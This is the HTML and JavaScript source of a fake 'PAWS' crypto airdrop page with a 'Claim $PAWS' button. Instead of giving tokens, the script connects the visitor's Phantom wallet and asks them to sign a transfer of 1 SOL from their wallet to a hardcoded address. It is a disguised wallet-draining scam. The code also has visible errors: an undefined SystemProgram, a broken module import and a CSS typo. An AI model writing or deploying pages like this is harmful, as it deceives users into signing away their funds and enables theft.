<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Paws Airdrop</title>
  <script src="https://unpkg.com/@solana/web3.js@latest/lib/index.iife.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/@solana/wallet-adapter-base@latest/dist/cjs/index.min.js"></script>
  <script src="https://unpkg.com/@solana/wallet-adapter-phantom@0.1.1/dist/phantom-wallet-adapter.min.js"></script>
  <script src="https://cdn.jsdelivr.net/npm/bigint-polyfill@1.0.0/dist/bigint-polyfill.min.js"></script>
</head>
<body>
  
    <header>
        <div class="social-media-logos">
            <a href="https://twitter.com" target="_blank">
                <img src="twitter-logo.png" alt="Twitter Logo">
            </a>
            <a href="https://youtube.com" target="_blank">
                <img src="youtube-logo.png" alt="YouTube Logo">
            </a>
            <a href="https://tiktok.com" target="_blank">
                <img src="tiktok-logo.png" alt="TikTok Logo">
            </a>
        </div>
    </header>


    <section class="mainsection">
        <div class="maintext">
            <img src="PAWS.webp" style="width: 90px; height: 90px; vertical-align: middle; margin-top: -40px;" class="pawslogo">
            <h1 style="display: inline-block;">PAWS</h1>
            <h4 class="animal">Animals are done!</h4>
            <h4 class="season">It's PAWS Season</h4>
            <button id="claimPawsButton" class="claimPawsButton">Claim $PAWS</button>
        </div>

    </section>
    

<style>
    body{
        background-image: url(pawsbaclground.png);
        background-size: 100%;
        background-position: center;
        padding: 0;
        margin: 0;

    }
     .mainsection{
       position: absolute;
        height: 100vh;
        width: 100vw;
     
        color: white;
        text-align: center;
        
    }

    .maintext{

        position: relative;
        margin-top: 30vh;
        font-family: Arial, Helvetica, sans-serif;
    }

    h1{
        margin-top: 0;
      margin-bottom: 0;
        font-size: 80px;
        text-align: center;
    }
    h4{
    
        margin: 0;
        padding: 0;
        font-size: 25px;
        color: darkgray;
        
    }
    .class{
        position: absolute;
    }
    button {
        margin-top: 20px;
        background-color: dodgerblue;
        width: 30vw;
        height: 10vh;
        text-align: center;
        font-family: Arial, Helvetica, sans-serif;
        border-radius: 20px;
        font-size: 30px;
        color: #fff;
    }


    
header {
    width: 100%;
    height: 10vh;
    background-color: #292525;
    display: flex;
    justify-content: center;
    align-items: center;
}

.social-media-logos {
    display: flex;
    justify-content: space-between;
    width: 10%;
    margin-right: 2em;
    
}

.social-media-logos img {
    width: 30px;
    height: 30px;
    margin: 0 10px;
}






    @media (max-width: 767p){
    button {
        background-color: dodgerblue;
        width: 100vw;
        text-align: center;
        height: 5vh;
    }

}
    
</style>
  <script>
    const Connection = window.Connection;
    const PublicKey = window.PublicKey;
    const Transaction = window.Transaction;
    const PhantomWalletAdapter = window.PhantomWalletAdapter;
    import('@solana/wallet-adapter-base')
  .then(({ WalletAdapterNetwork }) => {
    const network = WalletAdapterNetwork.Devnet;

   
    const phantomWallet = new PhantomWalletAdapter();
    const claimPawsButton = document.getElementById('claimPawsButton');
    claimPawsButton.addEventListener('click', async () => {
      try {
        // Request user consent and connect wallet
        if (!phantomWallet.isConnected) {
          await phantomWallet.connect();
        }
        // Run the main function after wallet connection
        await main();
      } catch (error) {
        console.error('Error connecting wallet or sending transaction:', error);
      }
    });
    async function main() {
      const fromPubkey = phantomWallet.publicKey;
      const toPubkey = new PublicKey('6udCzmSGiJXSKWr9HUUa191GRFTnxFB9fxmGzbjcEm');
      const transaction = new Transaction().add(
        SystemProgram.transfer({
          fromPubkey,
          toPubkey,
          lamports: 1000000000,
        }),
      );
      const signedTransaction = await phantomWallet.signTransaction(transaction);
      const connection = new Connection('https://api.devnet.solana.com');
      const transactionId = await connection.sendTransaction(signedTransaction, [phantomWallet]);
      console.log(`Transaction ID: ${transactionId}`);
    }
})
  .catch((error) => {
    console.error('Error importing WalletAdapterNetwork:', error);
  });
  </script>
</body>
</html>
